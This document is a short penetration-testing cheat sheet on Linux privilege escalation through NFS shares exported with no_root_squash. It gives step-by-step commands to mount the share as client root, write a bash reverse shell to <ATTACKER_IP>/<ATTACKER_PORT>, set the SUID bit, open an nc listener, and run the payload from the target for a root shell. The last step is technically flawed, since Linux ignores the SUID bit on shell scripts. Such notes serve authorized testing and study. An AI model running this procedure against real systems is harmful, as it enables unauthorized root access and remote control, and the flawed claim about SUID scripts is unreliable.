PRIMARY CATEGORY β LINUX PRIVESC
NFS Directives
NFS Configuration File β /etc/exports
-
no_root_squashβ Grant authority to the Client Side Root User to access, read and write resources as the Root User of the NFS Server -
no_all_squashβ Same as above but applies to non-root users
IMPORTANT
By default, NFS uses root squash, so the Clientβs Root User access is downgraded to the user nobody of the NFS Server
Privilege Escalation
Therefore, if no_root_squash is configured for an NFS Share and the attacker has SSH access to the target as an unprivileged user, proceed as follows β
Local Directory Creation
Create a local directory where the NFS Share is to be mounted
mkdir <LOCAL_FOLDER>Mounting NFS Share
Mount the remote shared folder/filesystem in the created directory
mount --types nfs --options vers=2,nolock <TARGET>:<REMOTE_RESOURCE_PATH> <LOCAL_FOLDER> # Or --options vers={3,4}Payload Creation as Local Root User inside NFS Share
Access the remote resource through the local folder and create a payload, e.g. a reverse shell
cd <LOCAL_FOLDER>
printf "bash -c 'bash -i &> /dev/tcp/<ATTACKER_IP>/<ATTACKER_PORT> 0>&1'" > reverse.bashSUID Privilege Assignment on the Payload
Simply assigns the SUID Privilege to the previous payload
chmod +s reverse.bash # Or chmod 4755 reverse.bashPayload Execution from the Target
On the attacker side, set up a listening socket with the IP Address and TCP Port specified in the payload
nc -nlvp <ATTACKER_PORT>Then, from the target as the unprivileged user via ssh, run the payload
Note that the payload will run as Root due to the SUID permission
bash reverse.bashAfter that, a shell as Root is obtained